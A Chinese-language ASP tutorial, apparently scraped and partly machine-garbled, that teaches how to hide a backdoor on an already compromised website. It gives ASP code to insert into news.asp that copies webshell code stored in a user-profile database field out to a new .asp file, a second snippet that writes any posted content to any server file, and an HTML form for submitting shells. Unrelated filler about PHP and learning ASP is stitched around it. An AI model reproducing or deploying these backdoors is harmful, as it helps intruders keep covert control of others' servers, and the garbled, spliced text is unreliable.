ASP编程：教你奇妙使用.mdb后缀数据库做后门

对于中小型web应用来说,php有很强的竞争力,linux+apache+mysql+php(lamp)的组合几乎可以胜任绝大多数网站的解决方案,对于大型应用来讲,对于系统架构要求更高,需要有成熟的框架支持,jsp的struts是个不错的框架,国内介绍它的资料也非常多,应用逐渐广泛起来。asp就不用说了，数据|数据库媒介：好长工夫了，从刚入手下手的站点办理器到如今盛行的几款asp后门，信任年夜多网管都能说出这些典范webshell的名字，如陆地、老兵、蓝屏等,也信任年夜多半的网管学会了关头字的搜刮办法来搜刮这些木马，固然如今的工夫假如再象埋没后门就要讲些技能啦，俗语说的好“佛高一尺，我高一丈”。
我不否定n早前的谁人把asp木马写到图片文件中不掉为一种好的办法，实在不但能够写到图片啦写到mp3文件里写到doc文件里都是能够的啦。
copy文件名/参数+文件名/参数天生文件名
如许的办法能够很天真的使用来到达埋没文件的目标，详细的参数就是/a以acsic码体例，/b二进制体例，就不罗嗦这些了，至于怎样上传webshell,甚么是webshell也不属于本文的会商局限。明天要讲的是怎样把后门放到后缀.mdb的中，条件是在我们拿到一个webshell以后……
我们所晓得的，良多站点在用户注册的时分要让填很多多少器材比方：用户名、暗码、QQ、邮箱、团体简介、德律风、接洽体例、住址一类的。而对应到中也城市有响应的表、字段、值。我明天要做的就是，我注册一个用户在我的团体简介的中央上写进shell代码，然后修正他站点上的一个文件，利用的时分触发这个文件，就把我团体简历中的shell代码，备份到以后目次下。
空话少说了，人人看代码：

<%
ifrequest("action")="firefox"then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
setrs=server.createobject("ADODB.recordset")
sql="select"&bname&"from"&tname&"where"&id&"="&idvalue&""""
rs.opensql,conn,1,3
ifnotrs.eofthen
content=rs(bname)
else
response.write"Nothing"
endif
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
endif
%>
将上边的代码加到站点的一个文件中，如news.asp。依据我们懂得的信息，在其站点注册后，下载看布局。我注册的firefox名字是在user表，其id值为119用于寄存我注册简历的表字段为jl。
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
那末在利用的时分我们就能够在news.asp不异目次下写进一个名为firefox.asp的webshell。以上能够说是万千埋没办法中的一种，下边再说别的一种更便利的埋没办法，这个办法就和mdb后缀有关系了。
一样我们仍是修正news.asp，将以下代码拔出到对方news.asp中：

<%
ifrequest("action")="firefox"then
n=request.form("n")
c=request.form("c")
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
endif
%>
这段代码绝对复杂些，算是一个木马的服务端吧。利用的时分以这段代码共同：

<HTML><HEAD>
<METAhttp-equiv=Content-Typecontent="text/html;charset=gb2312">
<title>F.s.t火狐手艺同盟[www.wrsky.com]</title>
<FORMaction="...method=post>
<METAcontent="MSHTML6.00.2900.2180"name=GENERATOR></HEAD>
<BODY>Name:<INPUTsize=50
name=nwidth="32"><BR><BR>Shell:<TEXTAREAname=crows=10cols=80
width="32"></TEXTAREA><INPUTtype=submitvalue=Save></FORM></BODY></HTML>
将以上代码中的：“http://localhost/config.asp?action=firefox”交换成你的服务端地点，然后保留为当地的.htm文件。当地翻开后界说要天生的文件名、文件内容、远程提交，ok，又是一种留后门的办法。
ASP脚本是采用明文（plaintext）方式来编写的。

如何学好ASP,以前也有人问过,把回答给你转过来看看能否对你有帮助:

运用ASP可将VBscript、javascript等脚本语言嵌入到HTML中，便可快速完成网站的应用程序，无需编译，可在服务器端直接执行。容易编写，使用普通的文本编辑器编写，如记事本就可以完成。由脚本在服务器上而不是客户端运行，ASP所使用的脚本语言都在服务端上运行。

ASP主要是用好六个对象，其实最主要的是用好其中两个：response和request，就可以随心所欲地控制网页变换和响应用户动作了。

完全不知道到底自己学的是什么。最后，除了教程里面说的几个例子，还是什么都不会。

Response:从字面上讲是“响应”，因此这个是服务端向客户端发送东西的，例如Response.Write

我们必须明确一个大方向，不要只是停留在因为学而去学,我们应有方向应有目标.

多看多学多思。多看一些关于ASP的书籍，一方面可以扩展知识面一方面可以鉴借别人是如何掌握、运用ASP的;多学善于关注别人，向同学老师多多学习，不论知识的大小;多思则是要将学到的知识灵活运用。

运用经典的例子。并且自己可以用他来实现一些简单的系统。如果可以对他进行进一步的修改，找出你觉得可以提高性能的地方，加上自己的设计，那就更上一个层次了，也就会真正地感到有所收获。